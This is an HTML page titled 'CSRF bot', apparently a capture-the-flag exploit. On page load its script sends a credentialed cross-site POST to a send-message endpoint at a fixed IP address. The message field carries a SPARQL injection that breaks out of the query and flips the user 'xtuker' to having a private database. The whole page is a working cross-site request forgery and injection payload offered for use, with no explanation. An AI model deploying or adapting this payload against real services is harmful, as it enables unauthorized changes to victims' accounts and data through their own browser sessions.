<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>CSRF bot</title>
</head>
<body>
<script>
    var xhr = new XMLHttpRequest();
    var req = 'user=xtuker&title=PrivateTitle&body=PrivateBody" };' +
        'DELETE { :xtuker :hasPrivateDatabase 0 } INSERT { :xtuker :hasPrivateDatabase 1 } WHERE { :xtuker :hasPrivateDatabase 0 }; ' +
        'INSERT DATA {:trash :t "trash"'
    xhr.open("POST", 'http://213.170.91.84/users-db/send-message', true)
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
    xhr.withCredentials = true;
    xhr.send(escape(req));
</script>
</body>
</html>